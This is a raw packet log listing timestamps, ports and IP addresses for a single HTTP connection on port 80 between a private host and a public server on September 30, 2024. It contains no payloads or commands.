Sep 30, 2024 15:10:15.150870085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.150973082 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151144028 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151144028 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151299953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151381016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151400089 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151418924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151470900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151493073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151511908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151546955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151597977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151617050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151635885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151654005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151654005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151654005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151668072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151716948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151766062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151819944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151823997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151875019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151892900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151911020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.151993036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.151993036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.152163029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.152700901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152753115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152771950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152790070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152807951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152826071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152842999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152858973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152874947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152888060 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.152898073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152915001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152931929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152949095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152964115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152978897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.152993917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153011084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153028011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153043032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153063059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153228998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153228998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153357983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153377056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153393984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153398037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153419018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153436899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153453112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153470993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153569937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153569937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153569937 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153570890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153609991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153626919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153644085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153660059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153676033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153692007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153709888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153726101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153738022 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153753042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153770924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153789043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153805971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.153908968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.153908968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.154078960 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.154320002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154433966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154587984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.154587984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.154704094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154716015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154869080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154922009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154927015 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.154927015 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.154941082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154952049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154963017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154973984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.154983997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155097008 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155124903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155175924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155186892 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155198097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155208111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155224085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155235052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155246019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155256987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155267000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155267000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155273914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155286074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155389071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155400038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155411005 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155421972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155437946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155539036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155550957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155561924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155572891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155591965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155606985 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155656099 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155826092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155826092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.155855894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.155905962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156034946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156089067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156100035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156111002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156121969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156141043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156152010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156162024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156166077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.156208992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156222105 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156276941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156287909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156337023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.156337023 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.156357050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156418085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156506062 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.156512022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156558990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.156676054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.156846046 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.156846046 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157033920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157088041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157099009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157109976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157120943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157140017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157150984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157161951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157172918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157182932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157196999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157207012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157217979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157228947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157234907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157246113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157284021 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157349110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157413960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157455921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157473087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157484055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157495022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157624006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157661915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157788038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157793999 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157841921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157854080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157918930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157963991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157963991 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.157982111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.157993078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158004045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158015013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158044100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158097982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158108950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158119917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158133984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.158170938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158224106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158235073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158246040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158288002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158304930 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.158343077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158473969 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.158643961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.158799887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158854961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158865929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158876896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158888102 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158899069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158910036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158956051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.158983946 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159038067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159092903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159104109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159115076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159162998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159251928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159291983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159343958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159356117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159367085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159421921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159436941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159486055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159594059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159594059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159594059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159723043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159743071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159763098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159933090 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.159960985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159980059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.159997940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160017014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160053968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160103083 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160120964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160140038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160159111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160207033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160274982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160274982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160274982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160274982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160332918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160351992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160370111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160389900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160410881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160429001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160475969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160491943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160491943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160586119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160604000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160662889 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160778999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160790920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160832882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160832882 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.160849094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160868883 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160888910 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.160924911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161001921 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161050081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161171913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161175966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161175966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161341906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161355972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161377907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161415100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161511898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161676884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161681890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161681890 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161726952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161745071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161761999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161780119 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161797047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161814928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161834002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161853075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161855936 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.161880016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161899090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161936045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161955118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.161989927 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.162008047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.162022114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.162031889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.162071943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.162071943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.162240982 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.175960064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.175991058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176012039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176033974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176053047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176071882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176091909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176109076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176126003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176142931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176160097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176187038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176203966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176222086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176253080 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176253080 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176253080 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176253080 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176419020 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176435947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176455021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176472902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176491022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176507950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176525116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176542997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176559925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176578045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176589966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176589966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176589966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176589966 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:15.176611900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176629066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176646948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176664114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176681995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176700115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:15.176718950 CEST	80	49754	172.67.215.93	192.168.11.20
